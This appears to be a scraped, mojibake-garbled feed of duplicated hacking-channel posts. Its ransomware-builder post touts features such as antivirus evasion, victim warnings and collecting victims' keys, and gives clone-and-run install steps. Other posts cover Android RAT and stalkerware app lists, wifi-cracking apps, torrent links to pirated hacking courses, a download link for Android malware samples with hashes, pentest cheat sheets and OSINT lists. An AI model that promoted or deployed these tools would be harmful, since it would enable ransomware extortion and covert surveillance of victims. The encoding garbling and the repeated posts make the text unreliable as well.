β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 RANSOMWARE :
F E A T U R E S :
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
4) On Linux, you might need to install these packages:
sudo apt install python3-tk python3-pil python3-pil.imagetk
5)Testing connection with remote server:
# Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
6) python3 test_socket.py
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 RANSOMWARE :
F E A T U R E S :
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
4) On Linux, you might need to install these packages:
sudo apt install python3-tk python3-pil python3-pil.imagetk
5)Testing connection with remote server:
# Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
6) python3 test_socket.py
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
#SOCIAL ENGINEER BOOKS& TUTORIALS :
Social-Engineer.com - The SECTF, DEFCON
- [Social-Engineer.com - DEFCON SECTF](https://www.social-engineer.org/sevillage-def-con/the-sectf/)
Most of these books covers the basics of psychology useful for a social engineer.
- [How to Win Friends and Influence People - Dale Carnegie](https://www.amazon.co.uk/d/Books/How-Win-Friends-Influence-People-Dale-Carnegie/0091906814/ref=sr_1_1?ie=UTF8&qid=1494621059&sr=8-1&keywords=how+to+win+friends+and+influence+people)
- [The 48 Laws of Power - Robert Greene](https://www.amazon.co.uk/d/Books/48-Laws-Power-Robert-Greene-Collection/1861972784/ref=sr_1_1?ie=UTF8&qid=1494621512&sr=8-1&keywords=the+48+laws+of+power)
- [The Psychology Book](https://www.amazon.co.uk/d/Books/Psychology-Book-Nigel-Benson/1405391243/ref=sr_1_1?ie=UTF8&qid=1494621589&sr=8-1&keywords=psychology)
- [The Power of Habit: Why We Do What We Do, and How to Change - Charles Duhigg](https://www.amazon.co.uk/Power-Habit-Why-What-Change/dp/1847946240/ref=sr_1_1?ie=UTF8&qid=1494621842&sr=8-1&keywords=the+power+of+habit)
- [Influence: The Psychology of Persuasion Paperback Γ’β¬β Robert B., PhD Cialdini](https://www.amazon.co.uk/d/cka/Influence-Psychology-Persuasion-Robert-B-PhD-Cialdini/006124189X/ref=sr_1_1?ie=UTF8&qid=1494621912&sr=8-1&keywords=influence)
- [Emotions Revealed: Understanding Faces and Feelings - Prof Paul Ekman](https://www.amazon.co.uk/Emotions-Revealed-Understanding-Faces-Feelings/dp/0753817659/ref=sr_1_1?ie=UTF8&qid=1494622003&sr=8-1&keywords=paul+ekman)
- [The Psychology of Interrogations and Confessions: A Handbook - Gisli H. Gudjonsson](https://www.amazon.co.uk/Psychology-Interrogations-Confessions-Handbook-Policing-x/dp/0470844612/ref=sr_1_1?s=books&ie=UTF8&qid=1494624501&sr=1-1&keywords=psychology+of+interrogation)
- [Mindfucking: A Critique of Mental Manipulation - Colin McGinn](https://www.goodreads.com/book/show/4049997-mindfucking)
- [What Every Body is Saying: An Ex-FBI Agent's Guide to Speed-Reading People - Joe Navarro, Marvin Karlins](https://www.goodreads.com/book/show/1173576.What_Every_Body_is_Saying)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
#SOCIAL ENGINEER BOOKS& TUTORIALS :
Social-Engineer.com - The SECTF, DEFCON
- [Social-Engineer.com - DEFCON SECTF](https://www.social-engineer.org/sevillage-def-con/the-sectf/)
Most of these books covers the basics of psychology useful for a social engineer.
- [How to Win Friends and Influence People - Dale Carnegie](https://www.amazon.co.uk/d/Books/How-Win-Friends-Influence-People-Dale-Carnegie/0091906814/ref=sr_1_1?ie=UTF8&qid=1494621059&sr=8-1&keywords=how+to+win+friends+and+influence+people)
- [The 48 Laws of Power - Robert Greene](https://www.amazon.co.uk/d/Books/48-Laws-Power-Robert-Greene-Collection/1861972784/ref=sr_1_1?ie=UTF8&qid=1494621512&sr=8-1&keywords=the+48+laws+of+power)
- [The Psychology Book](https://www.amazon.co.uk/d/Books/Psychology-Book-Nigel-Benson/1405391243/ref=sr_1_1?ie=UTF8&qid=1494621589&sr=8-1&keywords=psychology)
- [The Power of Habit: Why We Do What We Do, and How to Change - Charles Duhigg](https://www.amazon.co.uk/Power-Habit-Why-What-Change/dp/1847946240/ref=sr_1_1?ie=UTF8&qid=1494621842&sr=8-1&keywords=the+power+of+habit)
- [Influence: The Psychology of Persuasion Paperback Γ’β¬β Robert B., PhD Cialdini](https://www.amazon.co.uk/d/cka/Influence-Psychology-Persuasion-Robert-B-PhD-Cialdini/006124189X/ref=sr_1_1?ie=UTF8&qid=1494621912&sr=8-1&keywords=influence)
- [Emotions Revealed: Understanding Faces and Feelings - Prof Paul Ekman](https://www.amazon.co.uk/Emotions-Revealed-Understanding-Faces-Feelings/dp/0753817659/ref=sr_1_1?ie=UTF8&qid=1494622003&sr=8-1&keywords=paul+ekman)
- [The Psychology of Interrogations and Confessions: A Handbook - Gisli H. Gudjonsson](https://www.amazon.co.uk/Psychology-Interrogations-Confessions-Handbook-Policing-x/dp/0470844612/ref=sr_1_1?s=books&ie=UTF8&qid=1494624501&sr=1-1&keywords=psychology+of+interrogation)
- [Mindfucking: A Critique of Mental Manipulation - Colin McGinn](https://www.goodreads.com/book/show/4049997-mindfucking)
- [What Every Body is Saying: An Ex-FBI Agent's Guide to Speed-Reading People - Joe Navarro, Marvin Karlins](https://www.goodreads.com/book/show/1173576.What_Every_Body_is_Saying)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Security Through Education
The SECTF4Kids - Security Through Education
The SECTF4Kids at DEF CON 27 is designed for ages 6-12. Find out what the competition will include and the rules for participation.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wifi hacking new list 2020 android apps & tutorials
https://forum.xda-developers.com/showthread.php?t=2338179
https://www.kali.org/kali-linux-nethunter/
https://play.google.com/store/apps/details?
id=com.tester.wpswpatester
https://forum.xda-developers.com/showthread.php?t=1914699
https://forum.xda-developers.com/showthread.php?t=2236465
https://play.google.com/store/apps/details?id=lksystems.wifiintruder
https://github.com/w-shackleton/android-netspoof/
https://github.com/cSploit/android
https://play.google.com/store/apps/details?id=com.arcai.netcut
https://forum.xda-developers.com/showthread.php?t=2398114
https://play.google.com/store/apps/details?id=com.ngb.wpsconnect
https://play.google.com/store/apps/details?id=com.overlook.android.fing
https://play.google.com/store/apps/details?id=com.overlook.android.fing
https://play.google.com/store/apps/details?id=com.overlook.android.fing
https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wifi hacking new list 2020 android apps & tutorials
https://forum.xda-developers.com/showthread.php?t=2338179
https://www.kali.org/kali-linux-nethunter/
https://play.google.com/store/apps/details?
id=com.tester.wpswpatester
https://forum.xda-developers.com/showthread.php?t=1914699
https://forum.xda-developers.com/showthread.php?t=2236465
https://play.google.com/store/apps/details?id=lksystems.wifiintruder
https://github.com/w-shackleton/android-netspoof/
https://github.com/cSploit/android
https://play.google.com/store/apps/details?id=com.arcai.netcut
https://forum.xda-developers.com/showthread.php?t=2398114
https://play.google.com/store/apps/details?id=com.ngb.wpsconnect
https://play.google.com/store/apps/details?id=com.overlook.android.fing
https://play.google.com/store/apps/details?id=com.overlook.android.fing
https://play.google.com/store/apps/details?id=com.overlook.android.fing
https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
XDA Forums
[GUIDE] Use aircrack-ng on android phone using Wireless USB Adapter
Hey everyone,
It is possible to use an external Wi-Fi adapter with an android phone to run aircrack-ng, however I've had a lot of difficulties doing so. Here is a tutorial to make it easier for...
It is possible to use an external Wi-Fi adapter with an android phone to run aircrack-ng, however I've had a lot of difficulties doing so. Here is a tutorial to make it easier for...
Forwarded from UNDERCODE NEWS
In Windows 10 vulnerability helps you to write something to system folders
#Vulnerabilities
#Vulnerabilities
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 oscp and pentesting :
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf
http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html
http://h.ackack.net/cheat-sheets/netcat
Essentials
Exploit-db
https://www.exploit-db.com/
SecurityFocus - Vulnerability database
http://www.securityfocus.com/
Vuln Hub - Vulnerable by design
https://www.vulnhub.com/
Exploit Exercises
https://exploit-exercises.com/
SecLists - collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads
https://github.com/danielmiessler/SecLists
Security Tube
http://www.securitytube.net/
Metasploit Unleashed - free course on how to use Metasploit
https://www.offensive-security.com/metasploit-unleashed/
0Day Security Enumeration Guide http://www.0daysecurity.com/penetration-testing/enumeration.html
Github IO Book - Pen Testing Methodology
https://monkeysm8.gitbooks.io/pentesting-methodology/
Windows Privledge Escalation
Fuzzy Security http://www.fuzzysecurity.com/tutorials/16.html
accesschk.exe https://technet.microsoft.com/en-us/sysinternals/bb664922
Windows Priv Escalation For Pen Testers https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Elevating Privileges to Admin and Further https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
Transfer files to windows machines https://blog.netspi.com/15-ways-to-download-a-file/
enjoyβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 oscp and pentesting :
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf
http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html
http://h.ackack.net/cheat-sheets/netcat
Essentials
Exploit-db
https://www.exploit-db.com/
SecurityFocus - Vulnerability database
http://www.securityfocus.com/
Vuln Hub - Vulnerable by design
https://www.vulnhub.com/
Exploit Exercises
https://exploit-exercises.com/
SecLists - collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads
https://github.com/danielmiessler/SecLists
Security Tube
http://www.securitytube.net/
Metasploit Unleashed - free course on how to use Metasploit
https://www.offensive-security.com/metasploit-unleashed/
0Day Security Enumeration Guide http://www.0daysecurity.com/penetration-testing/enumeration.html
Github IO Book - Pen Testing Methodology
https://monkeysm8.gitbooks.io/pentesting-methodology/
Windows Privledge Escalation
Fuzzy Security http://www.fuzzysecurity.com/tutorials/16.html
accesschk.exe https://technet.microsoft.com/en-us/sysinternals/bb664922
Windows Priv Escalation For Pen Testers https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Elevating Privileges to Admin and Further https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
Transfer files to windows machines https://blog.netspi.com/15-ways-to-download-a-file/
enjoyβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.sans.org
Cyber Security Resources | SANS Institute
A collection of cybersecurity resources along with helpful links to SANS websites, web content and free cybersecurity resources.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Popular torrents hacking courses
1) Udemy - Hacking 101 β Creating a Hacking Lab (CISA, CEH, CISSP)
72 3 May. 31st '18 165.5 MB
tutsgalaxy
>https://1337x.to/torrent/3028688/Udemy-Hacking-101-Creating-a-Hacking-Lab-CISA-CEH-CISSP/
2) Udemy - SEO Tricks and Hacks: Making Search Engines Work for You.
69 47 Jun. 25th '19 1.1 GB
tutsgalaxy
>https://1337x.to/torrent/3847061/Udemy-SEO-Tricks-and-Hacks-Making-Search-Engines-Work-for-You/
3) Udemy - Computer and Network Hacking Mastery: Practical Techniques
68 11 Oct. 8th '19 506.6 MB
tutsgalaxy
> https://1337x.to/torrent/4042894/Udemy-Computer-and-Network-Hacking-Mastery-Practical-Techniques/
4) Udemy - Ethical Hacking With Python, JavaScript and Kali Linux
2 67 69 Apr. 3rd '19 12.2 GB
tutsgalaxy
> https://1337x.to/torrent/3931172/Udemy-Ethical-Hacking-Capture-the-Flag-Walkthroughs-v2/
5) Udemy - Ethical Hacking β Capture the Flag Walkthroughs β v2
64 38 Aug. 10th '19 1.3 GB
tutsgalaxy
> https://1337x.to/torrent/3931172/Udemy-Ethical-Hacking-Capture-the-Flag-Walkthroughs-v2/
6) Udemy - Cyber Security β Steps to prevent a web hacker.
61 21 Apr. 4th '19 941.0 MB
tutsgalaxy
> https://1337x.to/torrent/3688948/Udemy-Cyber-Security-Steps-to-prevent-a-web-hacker/
7) [UDEMY] LEARN PYTHON & ETHICAL HACKING FROM SCRATCH [FTU]
58 65 Aug. 17th '18 12.1 GB
SunRiseZone
> https://1337x.to/torrent/3179188/UDEMY-LEARN-PYTHON-ETHICAL-HACKING-FROM-SCRATCH-FTU/
8) UDEMY WEBSITE HACKING IN PRACTICE TUTORIAL
2 58 2 Jun. 25th '15 384.0 MB
RandalPaul
> https://1337x.to/torrent/1199583/UDEMY-WEBSITE-HACKING-IN-PRACTICE-TUTORIAL/
9) Udemy - The Complete Ethical Hacking Masterclass: Beginner To Expert
56 40 Aug. 28th '18 7.3 GB
tutsgalaxy
> https://1337x.to/torrent/3199051/Udemy-The-Complete-Ethical-Hacking-Masterclass-Beginner-To-Expert/
!0) Udemy - Learn Hacking Windows 10 Using Metasploit From Scratch
https://1337x.to/torrent/3135962/Udemy-Learn-Hacking-Windows-10-Using-Metasploit-From-Scratch/
enjoyβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Popular torrents hacking courses
1) Udemy - Hacking 101 β Creating a Hacking Lab (CISA, CEH, CISSP)
72 3 May. 31st '18 165.5 MB
tutsgalaxy
>https://1337x.to/torrent/3028688/Udemy-Hacking-101-Creating-a-Hacking-Lab-CISA-CEH-CISSP/
2) Udemy - SEO Tricks and Hacks: Making Search Engines Work for You.
69 47 Jun. 25th '19 1.1 GB
tutsgalaxy
>https://1337x.to/torrent/3847061/Udemy-SEO-Tricks-and-Hacks-Making-Search-Engines-Work-for-You/
3) Udemy - Computer and Network Hacking Mastery: Practical Techniques
68 11 Oct. 8th '19 506.6 MB
tutsgalaxy
> https://1337x.to/torrent/4042894/Udemy-Computer-and-Network-Hacking-Mastery-Practical-Techniques/
4) Udemy - Ethical Hacking With Python, JavaScript and Kali Linux
2 67 69 Apr. 3rd '19 12.2 GB
tutsgalaxy
> https://1337x.to/torrent/3931172/Udemy-Ethical-Hacking-Capture-the-Flag-Walkthroughs-v2/
5) Udemy - Ethical Hacking β Capture the Flag Walkthroughs β v2
64 38 Aug. 10th '19 1.3 GB
tutsgalaxy
> https://1337x.to/torrent/3931172/Udemy-Ethical-Hacking-Capture-the-Flag-Walkthroughs-v2/
6) Udemy - Cyber Security β Steps to prevent a web hacker.
61 21 Apr. 4th '19 941.0 MB
tutsgalaxy
> https://1337x.to/torrent/3688948/Udemy-Cyber-Security-Steps-to-prevent-a-web-hacker/
7) [UDEMY] LEARN PYTHON & ETHICAL HACKING FROM SCRATCH [FTU]
58 65 Aug. 17th '18 12.1 GB
SunRiseZone
> https://1337x.to/torrent/3179188/UDEMY-LEARN-PYTHON-ETHICAL-HACKING-FROM-SCRATCH-FTU/
8) UDEMY WEBSITE HACKING IN PRACTICE TUTORIAL
2 58 2 Jun. 25th '15 384.0 MB
RandalPaul
> https://1337x.to/torrent/1199583/UDEMY-WEBSITE-HACKING-IN-PRACTICE-TUTORIAL/
9) Udemy - The Complete Ethical Hacking Masterclass: Beginner To Expert
56 40 Aug. 28th '18 7.3 GB
tutsgalaxy
> https://1337x.to/torrent/3199051/Udemy-The-Complete-Ethical-Hacking-Masterclass-Beginner-To-Expert/
!0) Udemy - Learn Hacking Windows 10 Using Metasploit From Scratch
https://1337x.to/torrent/3135962/Udemy-Learn-Hacking-Windows-10-Using-Metasploit-From-Scratch/
enjoyβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IOS & ANDROID HACKING APPS NEW LIST :
https://github.com/wszf/androrat
https://www.zimperium.com/zanti-mobile-penetration-testing
https://f-droid.org/en/packages/org.csploit.android/
https://hackingvision.com/2017/06/21/faceniff-android-app/
https://hackingapks.com/droidbox-apk/
https://www.veracode.com/resources?
assettype=toolkit#resources-results
https://www.cydiahacks.net/xsellize-repo-source.html
https://github.com/BishopFox/iSpy
https://github.com/GeoSn0w/Myriam
https://www.elcomsoft.com/eppb.html
MSPY.COM
https://www.webwatcher.com/ free
https://ikeymonitor.com/
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IOS & ANDROID HACKING APPS NEW LIST :
https://github.com/wszf/androrat
https://www.zimperium.com/zanti-mobile-penetration-testing
https://f-droid.org/en/packages/org.csploit.android/
https://hackingvision.com/2017/06/21/faceniff-android-app/
https://hackingapks.com/droidbox-apk/
https://www.veracode.com/resources?
assettype=toolkit#resources-results
https://www.cydiahacks.net/xsellize-repo-source.html
https://github.com/BishopFox/iSpy
https://github.com/GeoSn0w/Myriam
https://www.elcomsoft.com/eppb.html
MSPY.COM
https://www.webwatcher.com/ free
https://ikeymonitor.com/
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - wszf/androrat: androrat
androrat. Contribute to wszf/androrat development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
[Bug Bounty] Exploiting Cookie Based XSS by Finding RCE.pdf
1.2 MB
While doing Bug Bounty Hunting , I found a Cookie Based XSS Vulnerability on a website. Cookie Based XSS basically is a Self XSS. It will be very unfortunate if the ndings were reported and only got Very Low Severity which for the severity there was no Bounty or Points given.
The scope of this program is very limited, but the target domain has lots of subdomains. The rst thing that comes to mind is looking for XSS Vulnerabilities in target subdomains that are out of scope to trigger Cookie Based XSS in in-scope target domains, so by that severity will increase at least to High or Medium.
The scope of this program is very limited, but the target domain has lots of subdomains. The rst thing that comes to mind is looking for XSS Vulnerabilities in target subdomains that are out of scope to trigger Cookie Based XSS in in-scope target domains, so by that severity will increase at least to High or Medium.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download AndroidMalware_2020
free β https://github.com/sk3ptre/AndroidMalware_2020 β
All Popular Android threats in 2020 :
January
Silent Adware
75fd1658cd6cb56f9194dbb1aabadd64
80abde70e5f4d4dc7ace31586097e026
1250f1296c0e92112d554960d4f99710
New Anubis samples
d4be1208d35bc8badb0fa97a36a28c8c
d936dad9349ebe2daf8f69427f414fdc
Coybot Brazilian banker
058de750a4a2402104e4bd22179f8432050c98ea88b5bfec2f065f6dc2a950f9
bf20ad4fcc9fb6910e481a199bb7da649bcd29dd91846692875a3a2c737b83d9
Bread
2273af79cae07c3d0d07eb4d3f30d60c
35027baae5178b5642dd6fa17857ff51
e674fb1705779c2e0599659a8a96befb
CVE exploitation in the wild
5db521d8bafa37bc3b96feebac99121e
8b6642efb498f829870fc108b8f2f29a
Fake AV
8476aa9e1887fadd03a1df0a608d5877
73107da87705c19c7ca8873f04323c6b
fd6ae5a3d73d9f13c2a88934d4af9a90
Shopaholic
0a421b0857cfe4d0066246cb87d8768c
0b54b822683a70b9d4a3af08a2d506b2
0b682e9cae5b8623fc3e62048623dcdb
Stars Wallpaper
42bd23110fbfde71be924a9bdb5a8381
Xiny
171dba383d562bec235156f101879223bf7b32c7
f9f87a2d2f4d91cd450aa9734e09534929170c6c
f9f87a2d2f4d91cd450aa9734e09534929170c6c
February
PremiumRateSMS
cf661506978f088f276a5a5bc4f0ea71101f99941840dd0864b2068ee2eb2271
Joker
d36be817f7dce6712d1e84b6e1a49e7a9210092749c508d7b1121854ebf018d8
5ec214704b63d93181932d389f4ed76bd730bd05e912518a1357a413d6fa96b1
Mobok
a9b6ad7233eed5b592a78e3a37e3143bd185554b4e9166aa2fa5ff0f99b1248c
e750766c16eca9501f07efe044db683dc08551c42d399ae8cc9e585345df8469
Anubis
c38c675a4342052a18e969e839cce797fef842b9d53032882966a3731ced0a70
AdFraud
a26ce61f3137307ab3456d6312d823bec7a3924d830d8764778803ad48843467
230f66be98f30155934379022cc8656e25917c4fd5c08a36903539ce1bd36f4c
381620b5fc7c3a2d73e0135c6b4ebd91e117882f804a4794f3a583b3b0c19bc5
Cerberus
6363beadf56ad162bc58fa8f1c5393223cd94221af0b3b2e9db0d718c3fae085
fe23b30a9296477557f027d4710e81eb1b08d65a1a83b6d81a4ed6128ed6e2a0
March
Banker
ce448fb2d1575f3a74ee59c611f6ec06
d5577c5f181d5496ae2ebd295a705a73
e491d383e9f89ba76864491598734e96
CookieStealer
65a92baefd41eb8c1a9df6c266992730
c907d74ace51cec7cb53b0c8720063e1
f84a43b008a25ba2ba1060b33daf14a5
MonitorMirror
ecac763feff38144e2834c43de813216
Adobot
c05fbe8f45ba26416b7ddbc2269603f9
BeanShell
57eb0919e5b8eee24547f74cb2a1562780ecb00c
28612e3c18f179d125f97443ba194e13d6ac635c
EventBot
7F5D728119951839B46895808107B281
8A563B6AF3CF74C8CBB88B99E104D949
7107AC3BCCD8DB274B21F0E494E3ECCC
F73F66B15791A42DAC86D0CED46D660F
& More on the same git link
Free: https://github.com/sk3ptre/AndroidMalware_2020
β git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download AndroidMalware_2020
free β https://github.com/sk3ptre/AndroidMalware_2020 β
All Popular Android threats in 2020 :
January
Silent Adware
75fd1658cd6cb56f9194dbb1aabadd64
80abde70e5f4d4dc7ace31586097e026
1250f1296c0e92112d554960d4f99710
New Anubis samples
d4be1208d35bc8badb0fa97a36a28c8c
d936dad9349ebe2daf8f69427f414fdc
Coybot Brazilian banker
058de750a4a2402104e4bd22179f8432050c98ea88b5bfec2f065f6dc2a950f9
bf20ad4fcc9fb6910e481a199bb7da649bcd29dd91846692875a3a2c737b83d9
Bread
2273af79cae07c3d0d07eb4d3f30d60c
35027baae5178b5642dd6fa17857ff51
e674fb1705779c2e0599659a8a96befb
CVE exploitation in the wild
5db521d8bafa37bc3b96feebac99121e
8b6642efb498f829870fc108b8f2f29a
Fake AV
8476aa9e1887fadd03a1df0a608d5877
73107da87705c19c7ca8873f04323c6b
fd6ae5a3d73d9f13c2a88934d4af9a90
Shopaholic
0a421b0857cfe4d0066246cb87d8768c
0b54b822683a70b9d4a3af08a2d506b2
0b682e9cae5b8623fc3e62048623dcdb
Stars Wallpaper
42bd23110fbfde71be924a9bdb5a8381
Xiny
171dba383d562bec235156f101879223bf7b32c7
f9f87a2d2f4d91cd450aa9734e09534929170c6c
f9f87a2d2f4d91cd450aa9734e09534929170c6c
February
PremiumRateSMS
cf661506978f088f276a5a5bc4f0ea71101f99941840dd0864b2068ee2eb2271
Joker
d36be817f7dce6712d1e84b6e1a49e7a9210092749c508d7b1121854ebf018d8
5ec214704b63d93181932d389f4ed76bd730bd05e912518a1357a413d6fa96b1
Mobok
a9b6ad7233eed5b592a78e3a37e3143bd185554b4e9166aa2fa5ff0f99b1248c
e750766c16eca9501f07efe044db683dc08551c42d399ae8cc9e585345df8469
Anubis
c38c675a4342052a18e969e839cce797fef842b9d53032882966a3731ced0a70
AdFraud
a26ce61f3137307ab3456d6312d823bec7a3924d830d8764778803ad48843467
230f66be98f30155934379022cc8656e25917c4fd5c08a36903539ce1bd36f4c
381620b5fc7c3a2d73e0135c6b4ebd91e117882f804a4794f3a583b3b0c19bc5
Cerberus
6363beadf56ad162bc58fa8f1c5393223cd94221af0b3b2e9db0d718c3fae085
fe23b30a9296477557f027d4710e81eb1b08d65a1a83b6d81a4ed6128ed6e2a0
March
Banker
ce448fb2d1575f3a74ee59c611f6ec06
d5577c5f181d5496ae2ebd295a705a73
e491d383e9f89ba76864491598734e96
CookieStealer
65a92baefd41eb8c1a9df6c266992730
c907d74ace51cec7cb53b0c8720063e1
f84a43b008a25ba2ba1060b33daf14a5
MonitorMirror
ecac763feff38144e2834c43de813216
Adobot
c05fbe8f45ba26416b7ddbc2269603f9
BeanShell
57eb0919e5b8eee24547f74cb2a1562780ecb00c
28612e3c18f179d125f97443ba194e13d6ac635c
EventBot
7F5D728119951839B46895808107B281
8A563B6AF3CF74C8CBB88B99E104D949
7107AC3BCCD8DB274B21F0E494E3ECCC
F73F66B15791A42DAC86D0CED46D660F
& More on the same git link
Free: https://github.com/sk3ptre/AndroidMalware_2020
β git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - sk3ptre/AndroidMalware_2020: Popular Android malware seen in 2020
Popular Android malware seen in 2020. Contribute to sk3ptre/AndroidMalware_2020 development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 new list of OSINT Resources :
* [Awesome OSINT](https://github.com/jivoi/awesome-osint) - Awesome list of OSINT
* [OSINT Framework](http://osintframework.com/) - Collection of various OSInt tools broken out by category.
* [Intel Techniques](https://inteltechniques.com/menu.html) - A collection of OSINT tools. Menu on the left can be used to navigate through the categories.
* [NetBootcamp OSINT Tools](http://netbootcamp.org/osinttools/) - A collection of OSINT links and custom Web interfaces to other services such as [Facebook Graph Search](http://netbootcamp.org/facebook.html) and [various paste sites](http://netbootcamp.org/pastesearch.html).
* [Automating OSINT blog](http://www.automatingosint.com/blog/) - A blog about OSINT curated by Justin Seitz, the same author of BHP.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 new list of OSINT Resources :
* [Awesome OSINT](https://github.com/jivoi/awesome-osint) - Awesome list of OSINT
* [OSINT Framework](http://osintframework.com/) - Collection of various OSInt tools broken out by category.
* [Intel Techniques](https://inteltechniques.com/menu.html) - A collection of OSINT tools. Menu on the left can be used to navigate through the categories.
* [NetBootcamp OSINT Tools](http://netbootcamp.org/osinttools/) - A collection of OSINT links and custom Web interfaces to other services such as [Facebook Graph Search](http://netbootcamp.org/facebook.html) and [various paste sites](http://netbootcamp.org/pastesearch.html).
* [Automating OSINT blog](http://www.automatingosint.com/blog/) - A blog about OSINT curated by Justin Seitz, the same author of BHP.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - jivoi/awesome-osint: :scream: A curated list of amazingly awesome OSINT
:scream: A curated list of amazingly awesome OSINT - jivoi/awesome-osint